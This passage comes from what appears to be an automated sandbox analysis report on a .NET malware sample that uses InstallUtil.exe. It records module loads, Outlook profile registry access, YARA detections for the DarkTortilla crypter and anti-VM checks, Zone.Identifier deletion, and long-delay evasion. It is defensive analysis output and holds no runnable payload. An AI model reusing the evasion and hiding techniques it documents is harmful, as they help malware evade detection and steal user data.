                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: pbCN4g6sN5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: pbCN4g6sN5.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    Yara detected DarkTortilla Crypter
                    Source: Yara matchFile source: 0.2.pbCN4g6sN5.exe.36a2f30.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.pbCN4g6sN5.exe.365d150.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.pbCN4g6sN5.exe.4b30000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.pbCN4g6sN5.exe.36a2f30.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.pbCN4g6sN5.exe.4b30000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.pbCN4g6sN5.exe.365d150.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2383848177.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2376499978.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: pbCN4g6sN5.exe PID: 5696, type: MEMORYSTR
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: pbCN4g6sN5.exe, o1K.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "invoke", new object[2]{null,new object[0]}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_0597E0DF push ds; retf 0_2_0597E0EF
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_05977C42 push eax; ret 0_2_05977C49
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_06D0814D pushfd ; retf 0_2_06D0814E
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_0764BFBA pushad ; ret 0_2_0764C015
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_0764984F push esp; retf 6987h0_2_07649AB9
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_077F9745 push edx; ret 0_2_077F974B
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_077F2555 push edi; iretd 0_2_077F2556
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BEA088 pushad ; retn 0002h5_2_02BEA0EA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BE9089 push ebx; retn 0002h5_2_02BE908A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BEA0E8 pushad ; retn 0002h5_2_02BEA0EA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BE9611 push edi; retn 0002h5_2_02BE9612
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BE8490 push edx; retn 0002h5_2_02BE8EEA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BE8481 push ecx; retn 0002h5_2_02BE8482
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BE9468 push esi; retn A802h5_2_02BE961A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BE9459 push esi; retn 0002h5_2_02BE945A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BE48D7 push eax; retn 0070h5_2_02BE4922
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BE498A push eax; retn 0070h5_2_02BE4962
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BE4927 push eax; retn 0070h5_2_02BE4912
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BE4927 push eax; retn 0070h5_2_02BE4962
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BE4977 push eax; retn 0070h5_2_02BE4982
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BE9DE0 pushad ; retn 0002h5_2_02BEA02A
                    Source: pbCN4g6sN5.exeStatic PE information: section name: .text entropy: 7.045918402735076

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeFile opened: C:\Users\user\Desktop\pbCN4g6sN5.exe\:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: pbCN4g6sN5.exe PID: 5696, type: MEMORYSTR
                    Tries to delay execution (extensive OutputDebugStringW loop)
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: OutputDebugStringW count: 1938
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeMemory allocated: A10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeMemory allocated: 2550000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeMemory allocated: 2390000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeMemory allocated: 7CC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeMemory allocated: 8CC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeMemory allocated: 8EB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeMemory allocated: 9EB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeMemory allocated: A270000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeMemory allocated: B270000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeMemory allocated: C270000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 12F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2DC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4DC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599867Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599421Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599077Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598968Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598851Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598504Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598375Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598156Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598047Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597937Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597827Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597718Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597609Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597390Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597170Jump to behavior
